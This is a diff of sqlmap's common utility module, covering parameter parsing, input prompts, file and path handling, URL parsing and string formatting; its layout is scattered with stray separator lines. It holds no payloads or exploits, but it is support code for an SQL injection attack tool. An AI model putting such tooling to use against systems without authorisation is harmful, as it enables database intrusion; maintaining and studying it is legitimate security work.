condition |= conf.testParameter is not None and parameter in conf.testParameter
|
||||||
condition |= place == PLACE.COOKIE and len(intersect((PLACE.COOKIE,), conf.testParameter, True)) > 0
|
condition |= place == PLACE.COOKIE and len(intersect((PLACE.COOKIE,), conf.testParameter, True)) > 0
|
||||||
|
|
||||||
if condition:
|
if condition:
|
||||||
testableParameters[parameter] = "=".join(parts[1:])
|
testableParameters[parameter] = "=".join(parts[1:])
|
||||||
if not conf.multipleTargets:
|
if not conf.multipleTargets and not (conf.csrfToken and parameter == conf.csrfToken):
|
||||||
_ = urldecode(testableParameters[parameter], convall=True)
|
_ = urldecode(testableParameters[parameter], convall=True)
|
||||||
if (_.strip(DUMMY_SQL_INJECTION_CHARS) != _\
|
if (_.endswith("'") and _.count("'") == 1
|
||||||
or re.search(r'\A9{3,}', _) or re.search(DUMMY_USER_INJECTION, _))\
|
or re.search(r'\A9{3,}', _) or re.search(DUMMY_USER_INJECTION, _))\
|
||||||
and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX):
|
and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX):
|
||||||
warnMsg = "it appears that you have provided tainted parameter values "
|
warnMsg = "it appears that you have provided tainted parameter values "
|
||||||
|
@ -572,10 +584,15 @@ def paramToDict(place, parameters=None):
|
||||||
warnMsg += "so sqlmap could be able to run properly"
|
warnMsg += "so sqlmap could be able to run properly"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
message = "are you sure you want to continue? [y/N] "
|
message = "are you really sure that you want to continue (sqlmap could have problems)? [y/N] "
|
||||||
test = readInput(message, default="N")
|
test = readInput(message, default="N")
|
||||||
if test[0] not in ("y", "Y"):
|
if test[0] not in ("y", "Y"):
|
||||||
raise SqlmapSilentQuitException
|
raise SqlmapSilentQuitException
|
||||||
|
elif not _:
|
||||||
|
warnMsg = "provided value for parameter '%s' is empty. " % parameter
|
||||||
|
warnMsg += "Please, always use only valid parameter values "
|
||||||
|
warnMsg += "so sqlmap could be able to run properly"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
if conf.testParameter and not testableParameters:
|
if conf.testParameter and not testableParameters:
|
||||||
paramStr = ", ".join(test for test in conf.testParameter)
|
paramStr = ", ".join(test for test in conf.testParameter)
|
||||||
|
@ -834,11 +851,19 @@ def dataToTrafficFile(data):
|
||||||
except IOError, ex:
|
except IOError, ex:
|
||||||
errMsg = "something went wrong while trying "
|
errMsg = "something went wrong while trying "
|
||||||
errMsg += "to write to the traffic file '%s' ('%s')" % (conf.trafficFile, ex)
|
errMsg += "to write to the traffic file '%s' ('%s')" % (conf.trafficFile, ex)
|
||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
def dataToDumpFile(dumpFile, data):
|
def dataToDumpFile(dumpFile, data):
|
||||||
|
try:
|
||||||
dumpFile.write(data)
|
dumpFile.write(data)
|
||||||
dumpFile.flush()
|
dumpFile.flush()
|
||||||
|
except IOError, ex:
|
||||||
|
if "No space left" in getUnicode(ex):
|
||||||
|
errMsg = "no space left on output device"
|
||||||
|
logger.error(errMsg)
|
||||||
|
else:
|
||||||
|
raise
|
||||||
|
|
||||||
|
|
||||||
def dataToOutFile(filename, data):
|
def dataToOutFile(filename, data):
|
||||||
retVal = None
|
retVal = None
|
||||||
|
@ -846,8 +871,13 @@ def dataToOutFile(filename, data):
|
||||||
if data:
|
if data:
|
||||||
retVal = os.path.join(conf.filePath, filePathToSafeString(filename))
|
retVal = os.path.join(conf.filePath, filePathToSafeString(filename))
|
||||||
|
|
||||||
with codecs.open(retVal, "wb", UNICODE_ENCODING) as f:
|
try:
|
||||||
|
with open(retVal, "w+b") as f:
|
||||||
f.write(data)
|
f.write(data)
|
||||||
|
except IOError, ex:
|
||||||
|
errMsg = "something went wrong while trying to write "
|
||||||
|
errMsg += "to the output file ('%s')" % ex.message
|
||||||
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
@ -866,11 +896,11 @@ def readInput(message, default=None, checkBatch=True):
|
||||||
elif message[-1] == ']':
|
elif message[-1] == ']':
|
||||||
message += " "
|
message += " "
|
||||||
|
|
||||||
if kb.prependFlag:
|
if kb.get("prependFlag"):
|
||||||
message = "\n%s" % message
|
message = "\n%s" % message
|
||||||
kb.prependFlag = False
|
kb.prependFlag = False
|
||||||
|
|
||||||
if conf.answers:
|
if conf.get("answers"):
|
||||||
for item in conf.answers.split(','):
|
for item in conf.answers.split(','):
|
||||||
question = item.split('=')[0].strip()
|
question = item.split('=')[0].strip()
|
||||||
answer = item.split('=')[1] if len(item.split('=')) > 1 else None
|
answer = item.split('=')[1] if len(item.split('=')) > 1 else None
|
||||||
|
@ -886,7 +916,7 @@ def readInput(message, default=None, checkBatch=True):
|
||||||
break
|
break
|
||||||
|
|
||||||
if retVal is None:
|
if retVal is None:
|
||||||
if checkBatch and conf.batch:
|
if checkBatch and conf.get("batch"):
|
||||||
if isListLike(default):
|
if isListLike(default):
|
||||||
options = ",".join(getUnicode(opt, UNICODE_ENCODING) for opt in default)
|
options = ",".join(getUnicode(opt, UNICODE_ENCODING) for opt in default)
|
||||||
elif default:
|
elif default:
|
||||||
|
@ -902,12 +932,16 @@ def readInput(message, default=None, checkBatch=True):
|
||||||
retVal = default
|
retVal = default
|
||||||
else:
|
else:
|
||||||
logging._acquireLock()
|
logging._acquireLock()
|
||||||
|
|
||||||
|
if conf.get("beep"):
|
||||||
|
beep()
|
||||||
|
|
||||||
dataToStdout("\r%s" % message, forceOutput=True, bold=True)
|
dataToStdout("\r%s" % message, forceOutput=True, bold=True)
|
||||||
kb.prependFlag = False
|
kb.prependFlag = False
|
||||||
|
|
||||||
try:
|
try:
|
||||||
retVal = raw_input() or default
|
retVal = raw_input() or default
|
||||||
retVal = getUnicode(retVal, system=True) if retVal else retVal
|
retVal = getUnicode(retVal, encoding=sys.stdin.encoding) if retVal else retVal
|
||||||
except:
|
except:
|
||||||
time.sleep(0.05) # Reference: http://www.gossamer-threads.com/lists/python/python/781893
|
time.sleep(0.05) # Reference: http://www.gossamer-threads.com/lists/python/python/781893
|
||||||
kb.prependFlag = True
|
kb.prependFlag = True
|
||||||
|
@ -974,13 +1008,33 @@ def sanitizeStr(value):
|
||||||
|
|
||||||
return getUnicode(value).replace("\n", " ").replace("\r", "")
|
return getUnicode(value).replace("\n", " ").replace("\r", "")
|
||||||
|
|
||||||
|
def getHeader(headers, key):
|
||||||
|
retVal = None
|
||||||
|
for _ in (headers or {}):
|
||||||
|
if _.upper() == key.upper():
|
||||||
|
retVal = headers[_]
|
||||||
|
break
|
||||||
|
return retVal
|
||||||
|
|
||||||
def checkFile(filename):
|
def checkFile(filename):
|
||||||
"""
|
"""
|
||||||
Checks for file existence
|
Checks for file existence and readability
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if not os.path.isfile(filename):
|
valid = True
|
||||||
raise SqlmapFilePathException("unable to read file '%s'" % filename)
|
|
||||||
|
if filename is None or not os.path.isfile(filename):
|
||||||
|
valid = False
|
||||||
|
|
||||||
|
if valid:
|
||||||
|
try:
|
||||||
|
with open(filename, "rb"):
|
||||||
|
pass
|
||||||
|
except:
|
||||||
|
valid = False
|
||||||
|
|
||||||
|
if not valid:
|
||||||
|
raise SqlmapSystemException("unable to read file '%s'" % filename)
|
||||||
|
|
||||||
def banner():
|
def banner():
|
||||||
"""
|
"""
|
||||||
|
@ -1046,13 +1100,18 @@ def setPaths():
|
||||||
paths.SQLMAP_UDF_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "udf")
|
paths.SQLMAP_UDF_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "udf")
|
||||||
paths.SQLMAP_XML_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "xml")
|
paths.SQLMAP_XML_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "xml")
|
||||||
paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, "banner")
|
paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, "banner")
|
||||||
paths.SQLMAP_OUTPUT_PATH = paths.get("SQLMAP_OUTPUT_PATH", os.path.join(os.path.expanduser("~"), ".sqlmap", "output"))
|
paths.SQLMAP_XML_PAYLOADS_PATH = os.path.join(paths.SQLMAP_XML_PATH, "payloads")
|
||||||
|
|
||||||
|
_ = os.path.join(os.path.expandvars(os.path.expanduser("~")), ".sqlmap")
|
||||||
|
paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding())
|
||||||
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
|
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
|
||||||
paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
|
paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
|
||||||
|
|
||||||
# sqlmap files
|
# sqlmap files
|
||||||
paths.SQLMAP_HISTORY = os.path.join(os.path.expanduser('~'), ".sqlmap_history")
|
paths.OS_SHELL_HISTORY = os.path.join(_, "os.hst")
|
||||||
|
paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst")
|
||||||
|
paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "sqlmap.hst")
|
||||||
|
paths.GITHUB_HISTORY = os.path.join(_, "github.hst")
|
||||||
paths.SQLMAP_CONFIG = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr())
|
paths.SQLMAP_CONFIG = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr())
|
||||||
paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, "common-columns.txt")
|
paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, "common-columns.txt")
|
||||||
paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt")
|
paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt")
|
||||||
|
@ -1062,8 +1121,7 @@ def setPaths():
|
||||||
paths.USER_AGENTS = os.path.join(paths.SQLMAP_TXT_PATH, "user-agents.txt")
|
paths.USER_AGENTS = os.path.join(paths.SQLMAP_TXT_PATH, "user-agents.txt")
|
||||||
paths.WORDLIST = os.path.join(paths.SQLMAP_TXT_PATH, "wordlist.zip")
|
paths.WORDLIST = os.path.join(paths.SQLMAP_TXT_PATH, "wordlist.zip")
|
||||||
paths.ERRORS_XML = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
|
paths.ERRORS_XML = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
|
||||||
paths.PAYLOADS_XML = os.path.join(paths.SQLMAP_XML_PATH, "payloads.xml")
|
paths.BOUNDARIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "boundaries.xml")
|
||||||
paths.INJECTIONS_XML = os.path.join(paths.SQLMAP_XML_PATH, "injections.xml")
|
|
||||||
paths.LIVE_TESTS_XML = os.path.join(paths.SQLMAP_XML_PATH, "livetests.xml")
|
paths.LIVE_TESTS_XML = os.path.join(paths.SQLMAP_XML_PATH, "livetests.xml")
|
||||||
paths.QUERIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
|
paths.QUERIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
|
||||||
paths.GENERIC_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")
|
paths.GENERIC_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")
|
||||||
|
@ -1072,6 +1130,10 @@ def setPaths():
|
||||||
paths.ORACLE_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "oracle.xml")
|
paths.ORACLE_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "oracle.xml")
|
||||||
paths.PGSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml")
|
paths.PGSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml")
|
||||||
|
|
||||||
|
for path in paths.values():
|
||||||
|
if any(path.endswith(_) for _ in (".txt", ".xml", ".zip")):
|
||||||
|
checkFile(path)
|
||||||
|
|
||||||
def weAreFrozen():
|
def weAreFrozen():
|
||||||
"""
|
"""
|
||||||
Returns whether we are frozen via py2exe.
|
Returns whether we are frozen via py2exe.
|
||||||
|
@ -1131,7 +1193,7 @@ def parseTargetDirect():
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
for dbmsName, data in DBMS_DICT.items():
|
for dbmsName, data in DBMS_DICT.items():
|
||||||
if conf.dbms in data[0]:
|
if dbmsName == conf.dbms or conf.dbms.lower() in data[0]:
|
||||||
try:
|
try:
|
||||||
if dbmsName in (DBMS.ACCESS, DBMS.SQLITE, DBMS.FIREBIRD):
|
if dbmsName in (DBMS.ACCESS, DBMS.SQLITE, DBMS.FIREBIRD):
|
||||||
if remote:
|
if remote:
|
||||||
|
@ -1142,7 +1204,9 @@ def parseTargetDirect():
|
||||||
conf.hostname = "localhost"
|
conf.hostname = "localhost"
|
||||||
conf.port = 0
|
conf.port = 0
|
||||||
elif not remote:
|
elif not remote:
|
||||||
errMsg = "missing remote connection details"
|
errMsg = "missing remote connection details (e.g. "
|
||||||
|
errMsg += "'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME' "
|
||||||
|
errMsg += "or 'access://DATABASE_FILEPATH')"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if dbmsName in (DBMS.MSSQL, DBMS.SYBASE):
|
if dbmsName in (DBMS.MSSQL, DBMS.SYBASE):
|
||||||
|
@ -1172,7 +1236,7 @@ def parseTargetDirect():
|
||||||
pass
|
pass
|
||||||
else:
|
else:
|
||||||
errMsg = "sqlmap requires '%s' third-party library " % data[1]
|
errMsg = "sqlmap requires '%s' third-party library " % data[1]
|
||||||
errMsg += "in order to directly connect to the database "
|
errMsg += "in order to directly connect to the DBMS "
|
||||||
errMsg += "%s. You can download it from '%s'" % (dbmsName, data[2])
|
errMsg += "%s. You can download it from '%s'" % (dbmsName, data[2])
|
||||||
errMsg += ". Alternative is to use a package 'python-sqlalchemy' "
|
errMsg += ". Alternative is to use a package 'python-sqlalchemy' "
|
||||||
errMsg += "with support for dialect '%s' installed" % data[3]
|
errMsg += "with support for dialect '%s' installed" % data[3]
|
||||||
|
@ -1193,7 +1257,8 @@ def parseTargetUrl():
|
||||||
errMsg += "on this platform"
|
errMsg += "on this platform"
|
||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
if not re.search("^http[s]*://", conf.url, re.I):
|
if not re.search("^http[s]*://", conf.url, re.I) and \
|
||||||
|
not re.search("^ws[s]*://", conf.url, re.I):
|
||||||
if ":443/" in conf.url:
|
if ":443/" in conf.url:
|
||||||
conf.url = "https://" + conf.url
|
conf.url = "https://" + conf.url
|
||||||
else:
|
else:
|
||||||
|
@ -1202,7 +1267,14 @@ def parseTargetUrl():
|
||||||
if CUSTOM_INJECTION_MARK_CHAR in conf.url:
|
if CUSTOM_INJECTION_MARK_CHAR in conf.url:
|
||||||
conf.url = conf.url.replace('?', URI_QUESTION_MARKER)
|
conf.url = conf.url.replace('?', URI_QUESTION_MARKER)
|
||||||
|
|
||||||
|
try:
|
||||||
urlSplit = urlparse.urlsplit(conf.url)
|
urlSplit = urlparse.urlsplit(conf.url)
|
||||||
|
except ValueError, ex:
|
||||||
|
errMsg = "invalid URL '%s' has been given ('%s'). " % (conf.url, ex)
|
||||||
|
errMsg += "Please be sure that you don't have any leftover characters (e.g. '[' or ']') "
|
||||||
|
errMsg += "in the hostname part"
|
||||||
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
hostnamePort = urlSplit.netloc.split(":") if not re.search("\[.+\]", urlSplit.netloc) else filter(None, (re.search("\[.+\]", urlSplit.netloc).group(0), re.search("\](:(?P<port>\d+))?", urlSplit.netloc).group("port")))
|
hostnamePort = urlSplit.netloc.split(":") if not re.search("\[.+\]", urlSplit.netloc) else filter(None, (re.search("\[.+\]", urlSplit.netloc).group(0), re.search("\](:(?P<port>\d+))?", urlSplit.netloc).group("port")))
|
||||||
|
|
||||||
conf.scheme = urlSplit.scheme.strip().lower() if not conf.forceSSL else "https"
|
conf.scheme = urlSplit.scheme.strip().lower() if not conf.forceSSL else "https"
|
||||||
|
@ -1214,6 +1286,8 @@ def parseTargetUrl():
|
||||||
|
|
||||||
try:
|
try:
|
||||||
_ = conf.hostname.encode("idna")
|
_ = conf.hostname.encode("idna")
|
||||||
|
except LookupError:
|
||||||
|
_ = conf.hostname.encode(UNICODE_ENCODING)
|
||||||
except UnicodeError:
|
except UnicodeError:
|
||||||
_ = None
|
_ = None
|
||||||
|
|
||||||
|
@ -1238,13 +1312,13 @@ def parseTargetUrl():
|
||||||
conf.url = getUnicode("%s://%s:%d%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path))
|
conf.url = getUnicode("%s://%s:%d%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path))
|
||||||
conf.url = conf.url.replace(URI_QUESTION_MARKER, '?')
|
conf.url = conf.url.replace(URI_QUESTION_MARKER, '?')
|
||||||
|
|
||||||
if not conf.referer and intersect(REFERER_ALIASES, conf.testParameter, True):
|
if not conf.referer and (intersect(REFERER_ALIASES, conf.testParameter, True) or conf.level >= 3):
|
||||||
debugMsg = "setting the HTTP Referer header to the target URL"
|
debugMsg = "setting the HTTP Referer header to the target URL"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.REFERER, conf.httpHeaders)
|
conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.REFERER, conf.httpHeaders)
|
||||||
conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url))
|
conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url.replace(CUSTOM_INJECTION_MARK_CHAR, "")))
|
||||||
|
|
||||||
if not conf.host and intersect(HOST_ALIASES, conf.testParameter, True):
|
if not conf.host and (intersect(HOST_ALIASES, conf.testParameter, True) or conf.level >= 5):
|
||||||
debugMsg = "setting the HTTP Host header to the target URL"
|
debugMsg = "setting the HTTP Host header to the target URL"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.HOST, conf.httpHeaders)
|
conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.HOST, conf.httpHeaders)
|
||||||
|
@ -1273,7 +1347,7 @@ def expandAsteriskForColumns(expression):
|
||||||
if expression != conf.query:
|
if expression != conf.query:
|
||||||
conf.db = db
|
conf.db = db
|
||||||
else:
|
else:
|
||||||
expression = re.sub(r"([^\w])%s" % conf.tbl, "\g<1>%s.%s" % (conf.db, conf.tbl), expression)
|
expression = re.sub(r"([^\w])%s" % re.escape(conf.tbl), "\g<1>%s.%s" % (conf.db, conf.tbl), expression)
|
||||||
else:
|
else:
|
||||||
conf.db = db
|
conf.db = db
|
||||||
conf.db = safeSQLIdentificatorNaming(conf.db)
|
conf.db = safeSQLIdentificatorNaming(conf.db)
|
||||||
|
@ -1501,39 +1575,55 @@ def normalizePath(filepath):
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
def safeExpandUser(filepath):
|
||||||
|
"""
|
||||||
|
Patch for a Python Issue18171 (http://bugs.python.org/issue18171)
|
||||||
|
"""
|
||||||
|
|
||||||
|
retVal = filepath
|
||||||
|
|
||||||
|
try:
|
||||||
|
retVal = os.path.expanduser(filepath)
|
||||||
|
except UnicodeDecodeError:
|
||||||
|
_ = locale.getdefaultlocale()
|
||||||
|
retVal = getUnicode(os.path.expanduser(filepath.encode(_[1] if _ and len(_) > 1 else UNICODE_ENCODING)))
|
||||||
|
|
||||||
|
return retVal
|
||||||
|
|
||||||
def safeStringFormat(format_, params):
|
def safeStringFormat(format_, params):
|
||||||
"""
|
"""
|
||||||
Avoids problems with inappropriate string format strings
|
Avoids problems with inappropriate string format strings
|
||||||
|
|
||||||
>>> safeStringFormat('foobar%d%s', ('1', 2))
|
>>> safeStringFormat('SELECT foo FROM %s LIMIT %d', ('bar', '1'))
|
||||||
u'foobar12'
|
u'SELECT foo FROM bar LIMIT 1'
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if format_.count(PAYLOAD_DELIMITER) == 2:
|
if format_.count(PAYLOAD_DELIMITER) == 2:
|
||||||
_ = format_.split(PAYLOAD_DELIMITER)
|
_ = format_.split(PAYLOAD_DELIMITER)
|
||||||
_[1] = _[1].replace("%d", "%s")
|
_[1] = re.sub(r"(\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>", _[1])
|
||||||
retVal = PAYLOAD_DELIMITER.join(_)
|
retVal = PAYLOAD_DELIMITER.join(_)
|
||||||
else:
|
else:
|
||||||
retVal = format_.replace("%d", "%s")
|
retVal = re.sub(r"(\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>", format_)
|
||||||
|
|
||||||
if isinstance(params, basestring):
|
if isinstance(params, basestring):
|
||||||
retVal = retVal.replace("%s", params, 1)
|
retVal = retVal.replace("%s", params, 1)
|
||||||
elif not isListLike(params):
|
elif not isListLike(params):
|
||||||
retVal = retVal.replace("%s", str(params), 1)
|
retVal = retVal.replace("%s", str(params), 1)
|
||||||
else:
|
else:
|
||||||
count, index = 0, 0
|
start, end = 0, len(retVal)
|
||||||
if retVal.count("%s") == len(params):
|
match = re.search(r"%s(.+)%s" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), retVal)
|
||||||
while index != -1:
|
if match and PAYLOAD_DELIMITER not in match.group(1):
|
||||||
index = retVal.find("%s")
|
start, end = match.start(), match.end()
|
||||||
if index != -1:
|
if retVal.count("%s", start, end) == len(params):
|
||||||
retVal = retVal[:index] + getUnicode(params[count]) + retVal[index + 2:]
|
for param in params:
|
||||||
count += 1
|
index = retVal.find("%s", start)
|
||||||
|
retVal = retVal[:index] + getUnicode(param) + retVal[index + 2:]
|
||||||
else:
|
else:
|
||||||
count = 0
|
count = 0
|
||||||
while True:
|
while True:
|
||||||
match = re.search(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", retVal)
|
match = re.search(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", retVal)
|
||||||
if match:
|
if match:
|
||||||
if count > len(params):
|
if count >= len(params):
|
||||||
raise Exception("wrong number of parameters during string formatting")
|
raise Exception("wrong number of parameters during string formatting")
|
||||||
else:
|
else:
|
||||||
retVal = re.sub(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>" % params[count], retVal, 1)
|
retVal = re.sub(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>" % params[count], retVal, 1)
|
||||||
|
@ -1671,13 +1761,17 @@ def getConsoleWidth(default=80):
|
||||||
width = int(os.getenv("COLUMNS"))
|
width = int(os.getenv("COLUMNS"))
|
||||||
else:
|
else:
|
||||||
try:
|
try:
|
||||||
process = execute("stty size", shell=True, stdout=PIPE, stderr=PIPE)
|
try:
|
||||||
|
FNULL = open(os.devnull, 'w')
|
||||||
|
except IOError:
|
||||||
|
FNULL = None
|
||||||
|
process = execute("stty size", shell=True, stdout=PIPE, stderr=FNULL or PIPE)
|
||||||
stdout, _ = process.communicate()
|
stdout, _ = process.communicate()
|
||||||
items = stdout.split()
|
items = stdout.split()
|
||||||
|
|
||||||
if len(items) == 2 and items[1].isdigit():
|
if len(items) == 2 and items[1].isdigit():
|
||||||
width = int(items[1])
|
width = int(items[1])
|
||||||
except OSError:
|
except (OSError, MemoryError):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
if width is None:
|
if width is None:
|
||||||
|
@ -1708,8 +1802,14 @@ def parseXmlFile(xmlFile, handler):
|
||||||
Parses XML file by a given handler
|
Parses XML file by a given handler
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
try:
|
||||||
with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as stream:
|
with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as stream:
|
||||||
parse(stream, handler)
|
parse(stream, handler)
|
||||||
|
except (SAXParseException, UnicodeError), ex:
|
||||||
|
errMsg = "something seems to be wrong with "
|
||||||
|
errMsg += "the file '%s' ('%s'). Please make " % (xmlFile, ex)
|
||||||
|
errMsg += "sure that you haven't made any changes to it"
|
||||||
|
raise SqlmapInstallationException, errMsg
|
||||||
|
|
||||||
def getSQLSnippet(dbms, sfile, **variables):
|
def getSQLSnippet(dbms, sfile, **variables):
|
||||||
"""
|
"""
|
||||||
|
@ -1749,7 +1849,7 @@ def getSQLSnippet(dbms, sfile, **variables):
|
||||||
if choice and choice[0].lower() == "y":
|
if choice and choice[0].lower() == "y":
|
||||||
for var in variables:
|
for var in variables:
|
||||||
msg = "insert value for variable '%s': " % var
|
msg = "insert value for variable '%s': " % var
|
||||||
val = readInput(msg)
|
val = readInput(msg, default="")
|
||||||
retVal = retVal.replace(r"%%%s%%" % var, val)
|
retVal = retVal.replace(r"%%%s%%" % var, val)
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
@ -1763,7 +1863,7 @@ def readCachedFileContent(filename, mode='rb'):
|
||||||
with kb.locks.cache:
|
with kb.locks.cache:
|
||||||
if filename not in kb.cache.content:
|
if filename not in kb.cache.content:
|
||||||
checkFile(filename)
|
checkFile(filename)
|
||||||
with codecs.open(filename, mode, UNICODE_ENCODING) as f:
|
with openFile(filename, mode) as f:
|
||||||
kb.cache.content[filename] = f.read()
|
kb.cache.content[filename] = f.read()
|
||||||
|
|
||||||
return kb.cache.content[filename]
|
return kb.cache.content[filename]
|
||||||
|
@ -1828,7 +1928,7 @@ def initCommonOutputs():
|
||||||
kb.commonOutputs = {}
|
kb.commonOutputs = {}
|
||||||
key = None
|
key = None
|
||||||
|
|
||||||
with codecs.open(paths.COMMON_OUTPUTS, 'r', UNICODE_ENCODING) as f:
|
with openFile(paths.COMMON_OUTPUTS, 'r') as f:
|
||||||
for line in f.readlines(): # xreadlines doesn't return unicode strings when codec.open() is used
|
for line in f.readlines(): # xreadlines doesn't return unicode strings when codec.open() is used
|
||||||
if line.find('#') != -1:
|
if line.find('#') != -1:
|
||||||
line = line[:line.find('#')]
|
line = line[:line.find('#')]
|
||||||
|
@ -1854,7 +1954,8 @@ def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, un
|
||||||
|
|
||||||
checkFile(filename)
|
checkFile(filename)
|
||||||
|
|
||||||
with codecs.open(filename, 'r', UNICODE_ENCODING, errors="ignore") if unicode_ else open(filename, 'r') as f:
|
try:
|
||||||
|
with openFile(filename, 'r', errors="ignore") if unicode_ else open(filename, 'r') as f:
|
||||||
for line in (f.readlines() if unicode_ else f.xreadlines()): # xreadlines doesn't return unicode strings when codec.open() is used
|
for line in (f.readlines() if unicode_ else f.xreadlines()): # xreadlines doesn't return unicode strings when codec.open() is used
|
||||||
if commentPrefix:
|
if commentPrefix:
|
||||||
if line.find(commentPrefix) != -1:
|
if line.find(commentPrefix) != -1:
|
||||||
|
@ -1879,6 +1980,10 @@ def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, un
|
||||||
retVal[line] = True
|
retVal[line] = True
|
||||||
else:
|
else:
|
||||||
retVal.append(line)
|
retVal.append(line)
|
||||||
|
except (IOError, OSError, MemoryError), ex:
|
||||||
|
errMsg = "something went wrong while trying "
|
||||||
|
errMsg += "to read the content of file '%s' ('%s')" % (filename, ex)
|
||||||
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
return retVal if not unique else retVal.keys()
|
return retVal if not unique else retVal.keys()
|
||||||
|
|
||||||
|
@ -1987,7 +2092,7 @@ def getPartRun(alias=True):
|
||||||
else:
|
else:
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def getUnicode(value, encoding=None, system=False, noneToNull=False):
|
def getUnicode(value, encoding=None, noneToNull=False):
|
||||||
"""
|
"""
|
||||||
Return the unicode representation of the supplied value:
|
Return the unicode representation of the supplied value:
|
||||||
|
|
||||||
|
@ -2003,10 +2108,9 @@ def getUnicode(value, encoding=None, system=False, noneToNull=False):
|
||||||
return NULL
|
return NULL
|
||||||
|
|
||||||
if isListLike(value):
|
if isListLike(value):
|
||||||
value = list(getUnicode(_, encoding, system, noneToNull) for _ in value)
|
value = list(getUnicode(_, encoding, noneToNull) for _ in value)
|
||||||
return value
|
return value
|
||||||
|
|
||||||
if not system:
|
|
||||||
if isinstance(value, unicode):
|
if isinstance(value, unicode):
|
||||||
return value
|
return value
|
||||||
elif isinstance(value, basestring):
|
elif isinstance(value, basestring):
|
||||||
|
@ -2014,17 +2118,15 @@ def getUnicode(value, encoding=None, system=False, noneToNull=False):
|
||||||
try:
|
try:
|
||||||
return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING)
|
